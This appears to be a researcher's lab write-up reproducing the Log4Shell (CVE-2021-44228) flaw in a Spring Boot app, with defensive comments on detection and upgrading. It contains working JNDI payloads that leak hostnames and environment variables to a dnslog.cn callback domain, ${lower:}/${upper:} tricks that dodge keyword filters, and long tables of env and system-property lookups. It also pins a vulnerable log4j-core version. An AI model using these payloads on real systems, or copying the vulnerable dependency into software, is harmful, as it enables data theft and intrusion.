https://twitter.com/jas502n/status/1468946197629272066
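Default setup (the stock Spring Boot web starter logs through Logback; the dependency tree below contains log4j-to-slf4j but no log4j-core, the artifact this write-up adds in the next step to reproduce the issue):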
<dependency>
<groupId>org.springframework.boot</groupId>
<artifactId>spring-boot-starter-web</artifactId>
</dependency>
mvn dependency:tree
[INFO] | | +- org.springframework.boot:spring-boot-starter-logging:jar:2.6.1:compile
[INFO] | | | +- ch.qos.logback:logback-classic:jar:1.2.7:compile
[INFO] | | | | \- ch.qos.logback:logback-core:jar:1.2.7:compile
[INFO] | | | +- org.apache.logging.log4j:log4j-to-slf4j:jar:2.14.1:compile
[INFO] | | | \- org.slf4j:jul-to-slf4j:jar:1.7.32:compile
[INFO] | | \- org.slf4j:slf4j-api:jar:1.7.32:compile
Change pom.xml: exclude the default logging starter and add log4j-core directly:
<!-- Lab-only configuration: removes Spring Boot's default logging starter (Logback) from the web starter. -->
<dependency>
<groupId>org.springframework.boot</groupId>
<artifactId>spring-boot-starter-web</artifactId>
<exclusions>
<exclusion>
<groupId>org.springframework.boot</groupId>
<artifactId>spring-boot-starter-logging</artifactId>
</exclusion>
</exclusions>
</dependency>
<!-- log4j-core 2.14.1 is affected by CVE-2021-44228 and is pinned here only to reproduce the issue.
     Real projects should use a fixed Log4j release as listed in the Apache Log4j security advisories. -->
<dependency>
<groupId>org.apache.logging.log4j</groupId>
<artifactId>log4j-core</artifactId>
<version>2.14.1</version>
</dependency>
$ java -jar log4jRCE-0.0.1-SNAPSHOT.jar
[*] CVE-2021-44228 Log4j2 Remote Code Injection
. ____ _ __ _ _
/\\ / ___'_ __ _ _(_)_ __ __ _ \ \ \ \
( ( )\___ | '_ | '_| | '_ \/ _` | \ \ \ \
\\/ ___)| |_)| | | | | || (_| | ) ) ) )
' |____| .__|_| |_|_| |_\__, | / / / /
=========|_|==============|___/=/_/_/_/
:: Spring Boot :: (v2.6.1)
2021-12-10 16:18:43.099 WARN 48536 --- [ main] o.s.boot.StartupInfoLogger : InetAddress.getLocalHost().getHostName() took 5005 milliseconds to respond. Please verify your network configuration (macOS machines may need to add entries to /etc/hosts).
2021-12-10 16:18:48.108 INFO 48536 --- [ main] c.example.log4jrce.Log4jRceApplication : Starting Log4jRceApplication v0.0.1-SNAPSHOT using Java 1.8.0_60 on JMacBookPro.local with PID 48536 (/Users/jas502n/IdeaProjects/log4jRCE/target/log4jRCE-0.0.1-SNAPSHOT.jar started by root in log4jRCE/target)
2021-12-10 16:18:48.109 INFO 48536 --- [ main] c.example.log4jrce.Log4jRceApplication : No active profile set, falling back to default profiles: default
2021-12-10 16:18:48.890 INFO 48536 --- [ main] o.s.b.w.embedded.tomcat.TomcatWebServer : Tomcat initialized with port(s): 8080 (http)
2021-12-10 16:18:48.902 INFO 48536 --- [ main] o.apache.catalina.core.StandardService : Starting service [Tomcat]
2021-12-10 16:18:48.902 INFO 48536 --- [ main] org.apache.catalina.core.StandardEngine : Starting Servlet engine: [Apache Tomcat/9.0.55]
2021-12-10 16:18:48.957 INFO 48536 --- [ main] o.a.c.c.C.[Tomcat].[localhost].[/] : Initializing Spring embedded WebApplicationContext
POST /login HTTP/1.1
Host: 127.0.0.1:8080
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 52
data=xxxxx
HTTP/1.1 200
Content-Type: text/html;charset=UTF-8
Content-Length: 15
Date: Fri, 10 Dec 2021 08:38:50 GMT
Connection: close
log4j2 success!
默认 Map 预先填充了 hostName 的值,该值是当前系统的主机名或IP地址,
参考文档:https://www.docs4dev.com/docs/zh/log4j2/2.x/all/manual-configuration.html
org.apache.logging.log4j.core.LoggerContext#setConfiguration
${hostName}
${env:COMPUTERNAME}
${env:USERDOMAIN}
${env:LOGONSERVER}
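Example (the inner lookup is resolved first, so the host name or environment value becomes a label of the DNS name being queried; outbound DNS logs showing such labels under an unfamiliar domain are therefore a useful detection signal):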
// log4j2 Default,For(Windows、Linux、macOS....)
${jndi:dns://${hostName}.iwk5r1.dnslog.cn}
// Equivalent to windows command(set|findstr your-hostname)
${jndi:dns://${env:COMPUTERNAME}.iwk5r1.dnslog.cn}
${jndi:dns://${env:USERDOMAIN}.iwk5r1.dnslog.cn}
https://github.com/woodpecker-appstore/log4j-payload-generator
this.strLookupMap.put("lower", new LowerLookup());
org.apache.logging.log4j.core.lookup.LowerLookup#lookup(org.apache.logging.log4j.core.LogEvent, java.lang.String)
package org.apache.logging.log4j.core.lookup;
import org.apache.logging.log4j.core.LogEvent;
import org.apache.logging.log4j.core.config.plugins.Plugin;
/**
 * Lookup plugin registered under the name {@code lower} in the {@code Lookup} category.
 * It returns the supplied key converted to lower case.
 *
 * <p>Security note: the conversion happens when the lookup is evaluated, so the text that
 * reaches later processing can differ from the text that was submitted. Controls that inspect
 * only the raw input for fixed keywords do not see the evaluated value.
 */
@Plugin(name = "lower", category = "Lookup")
public class LowerLookup implements StrLookup {

    public LowerLookup() {
    }

    /**
     * Converts {@code key} to lower case.
     *
     * @param key the text to convert; may be {@code null}
     * @return the lower-cased text, or {@code null} when {@code key} is {@code null}
     */
    public String lookup(final String key) {
        if (key == null) {
            return null;
        }
        // NOTE(review): toLowerCase() without a Locale argument follows the JVM default locale.
        return key.toLowerCase();
    }

    /**
     * Event-aware variant; the event is not consulted and the call is forwarded to
     * {@link #lookup(String)}.
     *
     * @param event the current log event (unused)
     * @param key the text to convert; may be {@code null}
     * @return the lower-cased text, or {@code null} when {@code key} is {@code null}
     */
    public String lookup(final LogEvent event, final String key) {
        return lookup(key);
    }
}
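Example (the log line shows the lookup result rather than the submitted text, which is why input filters that match only the literal keyword in the raw request are not a sufficient defence; upgrading Log4j is):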
data=${lower:JNDI}
2021-12-14 10:05:12.051 ERROR 31355 --- [io-18080-exec-6] c.e.l.Log4jRceApplication : >>> jndi
this.strLookupMap.put("upper", new UpperLookup());
org.apache.logging.log4j.core.lookup.UpperLookup#lookup(org.apache.logging.log4j.core.LogEvent, java.lang.String)
package org.apache.logging.log4j.core.lookup;
import org.apache.logging.log4j.core.LogEvent;
import org.apache.logging.log4j.core.config.plugins.Plugin;
/**
 * Lookup plugin registered under the name {@code upper} in the {@code Lookup} category.
 * It returns the supplied key converted to upper case.
 *
 * <p>Security note: like any lookup, the result is computed at evaluation time, so the
 * evaluated text can differ from the submitted text. Keyword matching on raw input alone
 * does not cover the evaluated value.
 */
@Plugin(name = "upper", category = "Lookup")
public class UpperLookup implements StrLookup {

    public UpperLookup() {
    }

    /**
     * Converts {@code key} to upper case.
     *
     * @param key the text to convert; may be {@code null}
     * @return the upper-cased text, or {@code null} when {@code key} is {@code null}
     */
    public String lookup(final String key) {
        // NOTE(review): toUpperCase() without a Locale argument follows the JVM default locale.
        return key == null ? null : key.toUpperCase();
    }

    /**
     * Event-aware variant; the event is ignored and the work is delegated to
     * {@link #lookup(String)}.
     *
     * @param event the current log event (unused)
     * @param key the text to convert; may be {@code null}
     * @return the upper-cased text, or {@code null} when {@code key} is {@code null}
     */
    public String lookup(final LogEvent event, final String key) {
        final String converted = lookup(key);
        return converted;
    }
}
Example:
data=${upper:jndi}
2021-12-14 10:08:29.286 ERROR 31355 --- [io-18080-exec-8] c.e.l.Log4jRceApplication : >>> JNDI
ID | usage | method |
---|---|---|
1 | ${java:version} | getSystemProperty("java.version") |
2 | ${java:runtime} | getRuntime() |
3 | ${java:vm} | getVirtualMachine() |
4 | ${java:os} | getOperatingSystem() |
5 | ${java:hw} | getHardware() |
6 | ${java:locale} | getLocale() |
org.apache.logging.log4j.core.lookup.JavaLookup
/**
 * Builds the hardware summary listed for {@code ${java:hw}}: processor count, {@code os.arch},
 * and the {@code sun.arch.data.model} and {@code sun.cpu.isalist} properties.
 *
 * <p>The two-argument {@code getSystemProperty} overload is defined outside this excerpt;
 * presumably it prepends the given prefix to the property value. Verify against the full class.
 *
 * <p>Security note: the result describes the host, so it should not be resolvable from
 * untrusted log content.
 *
 * @return the assembled hardware description
 */
public String getHardware() {
    final int processorCount = Runtime.getRuntime().availableProcessors();
    final String architecture = this.getSystemProperty("os.arch");
    final String dataModel = this.getSystemProperty("-", "sun.arch.data.model");
    final String instructionSets = this.getSystemProperty(", instruction sets: ", "sun.cpu.isalist");
    return "processors: " + processorCount + ", architecture: " + architecture + dataModel + instructionSets;
}
/**
 * Builds the locale summary listed for {@code ${java:locale}}: the JVM default locale and the
 * {@code file.encoding} system property.
 *
 * @return the assembled locale description
 */
public String getLocale() {
    final Locale defaultLocale = Locale.getDefault();
    final String platformEncoding = this.getSystemProperty("file.encoding");
    return "default locale: " + defaultLocale + ", platform encoding: " + platformEncoding;
}
/**
 * Builds the operating-system summary listed for {@code ${java:os}} from the {@code os.name},
 * {@code os.version}, {@code sun.os.patch.level}, {@code os.arch} and
 * {@code sun.arch.data.model} system properties.
 *
 * <p>The two-argument {@code getSystemProperty} overload is defined outside this excerpt;
 * presumably it prepends the given prefix to the property value. Verify against the full class.
 *
 * <p>Security note: OS name, version and patch level are fingerprinting data and should not be
 * resolvable from untrusted log content.
 *
 * @return the assembled operating-system description
 */
public String getOperatingSystem() {
    final String osName = this.getSystemProperty("os.name");
    final String osVersion = this.getSystemProperty("os.version");
    final String patchLevel = this.getSystemProperty(" ", "sun.os.patch.level");
    final String architecture = this.getSystemProperty("os.arch");
    final String dataModel = this.getSystemProperty("-", "sun.arch.data.model");
    return osName + " " + osVersion + patchLevel + ", architecture: " + architecture + dataModel;
}
/**
 * Builds the runtime summary listed for {@code ${java:runtime}} from the
 * {@code java.runtime.name}, {@code java.runtime.version} and {@code java.vendor}
 * system properties.
 *
 * @return the assembled runtime description
 */
public String getRuntime() {
    final String runtimeName = this.getSystemProperty("java.runtime.name");
    final String runtimeVersion = this.getSystemProperty("java.runtime.version");
    final String vendor = this.getSystemProperty("java.vendor");
    return runtimeName + " (build " + runtimeVersion + ") from " + vendor;
}
/**
 * Resolves a single system property by delegating to the {@code spLookup} field, which is
 * declared outside this excerpt.
 *
 * @param name the system property name
 * @return whatever {@code spLookup.lookup(name)} returns
 */
private String getSystemProperty(final String name) {
    final String value = this.spLookup.lookup(name);
    return value;
}
/**
 * Builds the virtual-machine summary listed for {@code ${java:vm}} from the
 * {@code java.vm.name}, {@code java.vm.version} and {@code java.vm.info} system properties.
 *
 * @return the assembled virtual-machine description
 */
public String getVirtualMachine() {
    final String vmName = this.getSystemProperty("java.vm.name");
    final String vmVersion = this.getSystemProperty("java.vm.version");
    final String vmInfo = this.getSystemProperty("java.vm.info");
    return vmName + " (build " + vmVersion + ", " + vmInfo + ")";
}
CLASSPATH,HOME,JAVA_HOME,LANG,LC_TERMINAL,LC_TERMINAL_VERSION,LESS,LOGNAME,LSCOLORS,LS_COLORS,MAIL,NLSPATH,OLDPWD,PAGER,PATH,PWD,SHELL,SHLVL,SSH_CLIENT,SSH_CONNECTION,SSH_TTY,TERM,USER,XDG_RUNTIME_DIR,XDG_SESSION_ID,XFILESEARCHPATH,ZSH,_
id | usage |
---|---|
1 | ${env:CLASSPATH} |
2 | ${env:HOME} |
3 | ${env:JAVA_HOME} |
4 | ${env:LANG} |
5 | ${env:LC_TERMINAL} |
6 | ${env:LC_TERMINAL_VERSION} |
7 | ${env:LESS} |
8 | ${env:LOGNAME} |
9 | ${env:LSCOLORS} |
10 | ${env:LS_COLORS} |
11 | ${env:MAIL} |
12 | ${env:NLSPATH} |
13 | ${env:OLDPWD} |
14 | ${env:PAGER} |
15 | ${env:PATH} |
16 | ${env:PWD} |
17 | ${env:SHELL} |
18 | ${env:SHLVL} |
19 | ${env:SSH_CLIENT} |
20 | ${env:SSH_CONNECTION} |
21 | ${env:SSH_TTY} |
22 | ${env:TERM} |
23 | ${env:USER} |
24 | ${env:XDG_RUNTIME_DIR} |
25 | ${env:XDG_SESSION_ID} |
26 | ${env:XFILESEARCHPATH} |
27 | ${env:ZSH} |
=E:,=ExitCode,A8_HOME,A8_ROOT_BIN,ALLUSERSPROFILE,APPDATA,CATALINA_BASE,CATALINA_HOME,CATALINA_OPTS,CATALINA_TMPDIR,CLASSPATH,CLIENTNAME,COMPUTERNAME,ComSpec,CommonProgramFiles,CommonProgramFiles(x86),CommonProgramW6432,FP_NO_HOST_CHECK,HOMEDRIVE,HOMEPATH,JRE_HOME,Java_Home,LOCALAPPDATA,LOGONSERVER,NUMBER_OF_PROCESSORS,OS,PATHEXT,PROCESSOR_ARCHITECTURE,PROCESSOR_IDENTIFIER,PROCESSOR_LEVEL,PROCESSOR_REVISION,PROMPT,PSModulePath,PUBLIC,Path,ProgramData,ProgramFiles,ProgramFiles(x86),ProgramW6432,SESSIONNAME,SystemDrive,SystemRoot,TEMP,TMP,ThisExitCode,USERDOMAIN,USERNAME,USERPROFILE,WORK_PATH,windir,windows_tracing_flags,windows_tracing_logfile
id | usage |
---|---|
1 | ${env:A8_HOME} |
2 | ${env:A8_ROOT_BIN} |
3 | ${env:ALLUSERSPROFILE} |
4 | ${env:APPDATA} |
5 | ${env:CATALINA_BASE} |
6 | ${env:CATALINA_HOME} |
7 | ${env:CATALINA_OPTS} |
8 | ${env:CATALINA_TMPDIR} |
9 | ${env:CLASSPATH} |
10 | ${env:CLIENTNAME} |
11 | ${env:COMPUTERNAME} |
12 | ${env:ComSpec} |
13 | ${env:CommonProgramFiles} |
14 | ${env:CommonProgramFiles(x86)} |
15 | ${env:CommonProgramW6432} |
16 | ${env:FP_NO_HOST_CHECK} |
17 | ${env:HOMEDRIVE} |
18 | ${env:HOMEPATH} |
19 | ${env:JRE_HOME} |
20 | ${env:Java_Home} |
21 | ${env:LOCALAPPDATA} |
22 | ${env:LOGONSERVER} |
23 | ${env:NUMBER_OF_PROCESSORS} |
24 | ${env:OS} |
25 | ${env:PATHEXT} |
26 | ${env:PROCESSOR_ARCHITECTURE} |
27 | ${env:PROCESSOR_IDENTIFIER} |
28 | ${env:PROCESSOR_LEVEL} |
29 | ${env:PROCESSOR_REVISION} |
30 | ${env:PROMPT} |
31 | ${env:PSModulePath} |
32 | ${env:PUBLIC} |
33 | ${env:Path} |
34 | ${env:ProgramData} |
35 | ${env:ProgramFiles} |
36 | ${env:ProgramFiles(x86)} |
37 | ${env:ProgramW6432} |
38 | ${env:SESSIONNAME} |
39 | ${env:SystemDrive} |
40 | ${env:SystemRoot} |
41 | ${env:TEMP} |
42 | ${env:TMP} |
43 | ${env:ThisExitCode} |
44 | ${env:USERDOMAIN} |
45 | ${env:USERNAME} |
46 | ${env:USERPROFILE} |
47 | ${env:WORK_PATH} |
48 | ${env:windir} |
49 | ${env:windows_tracing_flags} |
50 | ${env:windows_tracing_logfile} |
ANT_HOME,COMMAND_MODE,GOBIN,GOPATH,GOROOT,GRADLE_HOME,HOME,HOMEBREW_BOTTLE_DOMAIN,JAVA_HOME,JAVA_MAIN_CLASS_3651,LC_CTYPE,LESS,LOGNAME,LSCOLORS,LaunchInstanceID,OLDPWD,PAGER,PATH,PWD,SECURITYSESSIONID,SHELL,SSH_AUTH_SOCK,TIME_STYLE,TMPDIR,USER,VERSIONER_PYTHON_VERSION,XPC_FLAGS,XPC_SERVICE_NAME,ZSH,__CF_USER_TEXT_ENCODING
id | usage |
---|---|
1 | ${env:ANT_HOME} |
2 | ${env:COMMAND_MODE} |
3 | ${env:GOBIN} |
4 | ${env:GOPATH} |
5 | ${env:GOROOT} |
6 | ${env:GRADLE_HOME} |
7 | ${env:HOME} |
8 | ${env:HOMEBREW_BOTTLE_DOMAIN} |
9 | ${env:JAVA_HOME} |
10 | ${env:JAVA_MAIN_CLASS_3651} |
11 | ${env:LC_CTYPE} |
12 | ${env:LESS} |
13 | ${env:LOGNAME} |
14 | ${env:LSCOLORS} |
15 | ${env:LaunchInstanceID} |
16 | ${env:OLDPWD} |
17 | ${env:PAGER} |
18 | ${env:PATH} |
19 | ${env:PWD} |
20 | ${env:SECURITYSESSIONID} |
21 | ${env:SHELL} |
22 | ${env:SSH_AUTH_SOCK} |
23 | ${env:TIME_STYLE} |
24 | ${env:TMPDIR} |
25 | ${env:USER} |
26 | ${env:VERSIONER_PYTHON_VERSION} |
27 | ${env:XPC_FLAGS} |
28 | ${env:XPC_SERVICE_NAME} |
29 | ${env:ZSH} |
id | usage |
---|---|
1 | ${sys:awt.toolkit} |
2 | ${sys:file.encoding} |
3 | ${sys:file.encoding.pkg} |
4 | ${sys:file.separator} |
5 | ${sys:java.awt.graphicsenv} |
6 | ${sys:java.awt.printerjob} |
7 | ${sys:java.class.path} |
8 | ${sys:java.class.version} |
9 | ${sys:java.endorsed.dirs} |
10 | ${sys:java.ext.dirs} |
11 | ${sys:java.home} |
12 | ${sys:java.io.tmpdir} |
13 | ${sys:java.library.path} |
14 | ${sys:java.runtime.name} |
15 | ${sys:java.runtime.version} |
16 | ${sys:java.specification.name} |
17 | ${sys:java.specification.vendor} |
18 | ${sys:java.specification.version} |
19 | ${sys:java.vendor} |
20 | ${sys:java.vendor.url} |
21 | ${sys:java.vendor.url.bug} |
22 | ${sys:java.version} |
23 | ${sys:java.vm.info} |
24 | ${sys:java.vm.name} |
25 | ${sys:java.vm.specification.name} |
26 | ${sys:java.vm.specification.vendor} |
27 | ${sys:java.vm.specification.version} |
28 | ${sys:java.vm.vendor} |
29 | ${sys:java.vm.version} |
30 | ${sys:line.separator} |
31 | ${sys:os.arch} |
32 | ${sys:os.name} |
33 | ${sys:os.version} |
34 | ${sys:path.separator} |
35 | ${sys:sun.arch.data.model} |
36 | ${sys:sun.boot.class.path} |
37 | ${sys:sun.boot.library.path} |
38 | ${sys:sun.cpu.endian} |
39 | ${sys:sun.cpu.isalist} |
40 | ${sys:sun.desktop} |
41 | ${sys:sun.io.unicode.encoding} |
42 | ${sys:sun.java.command} |
43 | ${sys:sun.java.launcher} |
44 | ${sys:sun.jnu.encoding} |
45 | ${sys:sun.management.compiler} |
46 | ${sys:sun.os.patch.level} |
47 | ${sys:sun.stderr.encoding} |
48 | ${sys:user.country} |
49 | ${sys:user.dir} |
50 | ${sys:user.home} |
51 | ${sys:user.language} |
52 | ${sys:user.name} |
53 | ${sys:user.script} |
54 | ${sys:user.timezone} |
55 | ${sys:user.variant} |